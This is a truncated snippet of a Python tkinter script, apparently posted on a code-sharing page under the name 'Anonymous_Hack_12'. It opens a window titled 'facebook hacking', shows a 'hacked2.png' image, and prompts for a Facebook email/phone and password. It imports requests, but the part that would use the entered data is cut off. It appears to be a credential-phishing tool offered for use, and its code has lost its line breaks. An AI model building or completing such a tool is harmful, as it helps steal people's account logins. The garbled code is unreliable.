Python Scripts WiFi/ facebook
# by l54# Anonymous_Hack_12import tkinter as tkfrom tkinter import messageboximport requestsimport timewindow = tk.Tk()window.title("facebook hacking")window.geometry("400x500")window.resizable(False, False)image = tk.PhotoImage(file="hacked2.png")image_label = tk.Label(image=image)image_label.pack(side="top", fill="both", expand=True)email_label = tk.Label(text="Email/Phone:")email_label.pack()email_entry = tk.Entry()email_entry.pack()password_entry = tk.Label(text="Password:")password_entry.pack()password_entry = tk.Entry(show="*")password_entry.pack()password…
You must be logged in to post a comment.